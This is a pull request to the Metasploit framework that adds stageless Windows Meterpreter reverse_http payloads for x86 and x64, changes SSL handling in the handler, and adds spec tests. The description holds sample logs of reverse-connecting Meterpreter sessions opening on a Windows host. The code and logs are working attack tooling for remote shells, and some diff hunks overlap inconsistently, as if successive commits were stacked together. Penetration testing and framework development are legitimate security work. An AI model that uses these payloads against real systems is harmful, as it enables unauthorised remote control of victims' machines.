### PR TITLE
Add support for stageless reverse_http payloads

### DIFF
--- a/lib/msf/core/handler/reverse_http/stageless.rb
+++ b/lib/msf/core/handler/reverse_http/stageless.rb
@@ -26,7 +26,7 @@ module Handler::ReverseHttp::Stageless
     ], self.class)
   end
 
-  def generate_stageless(&block)
+  def generate_stageless(ssl, &block)
     url = "https://#{datastore['LHOST']}:#{datastore['LPORT']}#{generate_uri_uuid_mode(:connect)}/"
 
     unless block_given?
@@ -49,12 +49,15 @@ module Handler::ReverseHttp::Stageless
       #  end
       #end
 
-      verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
-                                           datastore['HandlerSSLCert'])
+      verify_cert_hash = nil
+      if ssl
+        verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
+                                             datastore['HandlerSSLCert'])
+      end
 
       Rex::Payloads::Meterpreter::Patch.patch_passive_service!(dll,
         :url           => url,
-        :ssl           => true,
+        :ssl           => ssl,
         :ssl_cert_hash => verify_cert_hash,
         :expiration    => datastore['SessionExpirationTimeout'].to_i,
         :comm_timeout  => datastore['SessionCommunicationTimeout'].to_i,

--- a/lib/msf/core/handler/reverse_http/stageless.rb
+++ b/lib/msf/core/handler/reverse_http/stageless.rb
@@ -36,19 +36,6 @@ module Handler::ReverseHttp::Stageless
     # invoke the given function to generate the architecture specific payload
     block.call(url) do |dll|
 
-      # TODO: figure out this bit
-      # patch the target ID into the URI if specified
-      #if opts[:target_id]
-      #  i = dll.index("/123456789 HTTP/1.0\r\n\r\n\x00")
-      #  if i
-      #    t = opts[:target_id].to_s
-      #    raise "Target ID must be less than 5 bytes" if t.length > 4
-      #    u = "/B#{t} HTTP/1.0\r\n\r\n\x00"
-      #    print_status("Patching Target ID #{t} into DLL")
-      #    dll[i, u.length] = u
-      #  end
-      #end
-
       verify_cert_hash = nil
       if ssl
         verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],

--- a/modules/payloads/singles/windows/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_http.rb
@@ -4,7 +4,7 @@
 ##
 
 require 'msf/core'
-require 'msf/core/handler/reverse_https'
+require 'msf/core/handler/reverse_http'
 require 'msf/core/handler/reverse_http/stageless'
 require 'msf/core/payload/windows/stageless_meterpreter'
 require 'msf/base/sessions/meterpreter_x86_win'
@@ -21,13 +21,13 @@ module Metasploit4
   def initialize(info = {})
 
     super(merge_info(info,
-      'Name'        => 'Windows Meterpreter Shell, Reverse HTTPS Inline',
+      'Name'        => 'Windows Meterpreter Shell, Reverse HTTP Inline',
       'Description' => 'Connect back to attacker and spawn a Meterpreter shell',
       'Author'      => [ 'OJ Reeves' ],
       'License'     => MSF_LICENSE,
       'Platform'    => 'win',
       'Arch'        => ARCH_X86,
-      'Handler'     => Msf::Handler::ReverseHttps,
+      'Handler'     => Msf::Handler::ReverseHttp,
       'Session'     => Msf::Sessions::Meterpreter_x86_Win
       ))
 
@@ -37,8 +37,9 @@ module Metasploit4
   def generate
     # generate a stageless payload using the x86 version of
     # the stageless generator
-    generate_stageless(true, &method(:generate_stageless_x86))
+    generate_stageless(false, &method(:generate_stageless_x86))
   end
 
 end
+
 

--- a/modules/payloads/singles/windows/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_http.rb
@@ -37,9 +37,11 @@ module Metasploit4
   def generate
     # generate a stageless payload using the x86 version of
     # the stageless generator
-    generate_stageless(false, &method(:generate_stageless_x86))
+    opts = {
+      :ssl       => false,
+      :generator => method(:generate_stageless_x86)
+    }
+    generate_stageless(opts)
   end
 
 end
-
-

--- a/modules/payloads/singles/windows/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_https.rb
@@ -37,8 +37,11 @@ module Metasploit4
   def generate
     # generate a stageless payload using the x86 version of
     # the stageless generator
-    generate_stageless(true, &method(:generate_stageless_x86))
+    opts = {
+      :ssl       => true,
+      :generator => method(:generate_stageless_x86)
+    }
+    generate_stageless(opts)
   end
 
 end
-

--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb
@@ -37,10 +37,11 @@ module Metasploit4
   def generate
     # generate a stageless payload using the x64 version of
     # the stageless generator
-    generate_stageless(false, &method(:generate_stageless_x64))
+    opts = {
+      :ssl       => false,
+      :generator => method(:generate_stageless_x64)
+    }
+    generate_stageless(opts)
   end
 
 end
-
-
-

--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb
@@ -4,41 +4,43 @@
 ##
 
 require 'msf/core'
-require 'msf/core/handler/reverse_https'
+require 'msf/core/handler/reverse_http'
 require 'msf/core/handler/reverse_http/stageless'
-require 'msf/core/payload/windows/stageless_meterpreter'
-require 'msf/base/sessions/meterpreter_x86_win'
+require 'msf/core/payload/windows/x64/stageless_meterpreter'
+require 'msf/base/sessions/meterpreter_x64_win'
 require 'msf/base/sessions/meterpreter_options'
 
 module Metasploit4
 
   CachedSize = :dynamic
 
-  include Msf::Payload::Windows::StagelessMeterpreter
+  include Msf::Payload::Windows::StagelessMeterpreter_x64
   include Msf::Handler::ReverseHttp::Stageless
   include Msf::Sessions::MeterpreterOptions
 
   def initialize(info = {})
 
     super(merge_info(info,
-      'Name'        => 'Windows Meterpreter Shell, Reverse HTTPS Inline',
+      'Name'        => 'Windows Meterpreter Shell, Reverse HTTP Inline (x64)',
       'Description' => 'Connect back to attacker and spawn a Meterpreter shell',
       'Author'      => [ 'OJ Reeves' ],
       'License'     => MSF_LICENSE,
       'Platform'    => 'win',
-      'Arch'        => ARCH_X86,
-      'Handler'     => Msf::Handler::ReverseHttps,
-      'Session'     => Msf::Sessions::Meterpreter_x86_Win
+      'Arch'        => ARCH_X64,
+      'Handler'     => Msf::Handler::ReverseHttp,
+      'Session'     => Msf::Sessions::Meterpreter_x64_Win
       ))
 
     initialize_stageless
   end
 
   def generate
-    # generate a stageless payload using the x86 version of
+    # generate a stageless payload using the x64 version of
     # the stageless generator
-    generate_stageless(true, &method(:generate_stageless_x86))
+    generate_stageless(false, &method(:generate_stageless_x64))
   end
 
 end
+
+
 

--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb
@@ -37,9 +37,11 @@ module Metasploit4
   def generate
     # generate a stageless payload using the x64 version of
     # the stageless generator
-    generate_stageless(true, &method(:generate_stageless_x64))
+    opts = {
+      :ssl       => true,
+      :generator => method(:generate_stageless_x64)
+    }
+    generate_stageless(opts)
   end
 
 end
-
-

--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb
@@ -37,7 +37,7 @@ module Metasploit4
   def generate
     # generate a stageless payload using the x64 version of
     # the stageless generator
-    generate_stageless(&method(:generate_stageless_x64))
+    generate_stageless(true, &method(:generate_stageless_x64))
   end
 
 end

--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -2453,6 +2453,16 @@ describe 'modules/payloads', :content do
                           reference_name: 'windows/meterpreter_bind_tcp'
   end
 
+  context 'windows/meterpreter_reverse_http' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                            'singles/windows/meterpreter_reverse_http'
+                          ],
+                          dynamic_size: true,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'windows/meterpreter_reverse_http'
+  end
+
   context 'windows/meterpreter_reverse_https' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [
@@ -3527,6 +3537,16 @@ describe 'modules/payloads', :content do
                           dynamic_size: true,
                           modules_pathname: modules_pathname,
                           reference_name: 'windows/x64/meterpreter_bind_tcp'
+  end
+
+  context 'windows/x64/meterpreter_reverse_http' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'singles/windows/x64/meterpreter_reverse_http'
+                          ],
+                          dynamic_size: true,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'windows/x64/meterpreter_reverse_http'
   end
 
   context 'windows/x64/meterpreter_reverse_https' do


### PR DESCRIPTION
Simple PR, and the need for an in-depth description as it's basically the same as dealing with all the stageless stuff we've done so far. This includes both x64 and x86 versions of `meterpreter_reverse_http`.
## Verification
- [x] Windows x86 stageless HTTP works
- [x] Windows x86 stageless HTTPS still works
- [x] Windows x64 stageless HTTP works
- [x] Windows x64 stageless HTTPS still works
## Sample run

Reverse HTTP x64

```
msf exploit(handler) > run

[*] Started HTTP reverse handler on http://0.0.0.0:8000/
[*] Starting the payload handler...
[*] 10.1.10.35:64600 Request received for /EbXvSnxxiy4rRCpHfmcAGgqYh_b1xgP6f_Xl8mJdRTJ5_NTIuMxYYJYj-pbsRdtVs_yMQ359uXrwJQD24ubaKBPLGKjlPI9Y-ALP/... (UUID:11b5ef4a7c718b2e/x64=3/windows=1/2015-04-07T00:57:02Z)
[*] Incoming orphaned or stageless session /EbXvSnxxiy4rRCpHfmcAGgqYh_b1xgP6f_Xl8mJdRTJ5_NTIuMxYYJYj-pbsRdtVs_yMQ359uXrwJQD24ubaKBPLGKjlPI9Y-ALP/, attaching...
[*] Meterpreter session 1 opened (10.1.10.40:8000 -> 10.1.10.35:64600) at 2015-04-07 10:57:18 +1000

meterpreter > getuid
Server username: WIN-S45GUQ5KGVK\OJ
```

Reverse HTTP x86

```
msf exploit(handler) > run

[*] Started HTTP reverse handler on http://0.0.0.0:8000/
[*] Starting the payload handler...
[*] 10.1.10.35:64598 Request received for /5rb8J5nmmEYQ_RH8Rd46ugGmjIyiQVP2iAa6L3EqaFaTvtFb9dQZqy-G9wFNDxWHfPJmHBuWI3IBSCj2GJcbe-59Koy8f/... (UUID:e6b6fc2799e69846/x86=1/windows=1/2015-04-07T00:52:23Z)
[*] Incoming orphaned or stageless session /5rb8J5nmmEYQ_RH8Rd46ugGmjIyiQVP2iAa6L3EqaFaTvtFb9dQZqy-G9wFNDxWHfPJmHBuWI3IBSCj2GJcbe-59Koy8f/, attaching...
[*] Meterpreter session 1 opened (10.1.10.40:8000 -> 10.1.10.35:64598) at 2015-04-07 10:55:44 +1000

meterpreter > getuid
Server username: WIN-S45GUQ5KGVK\OJ
```
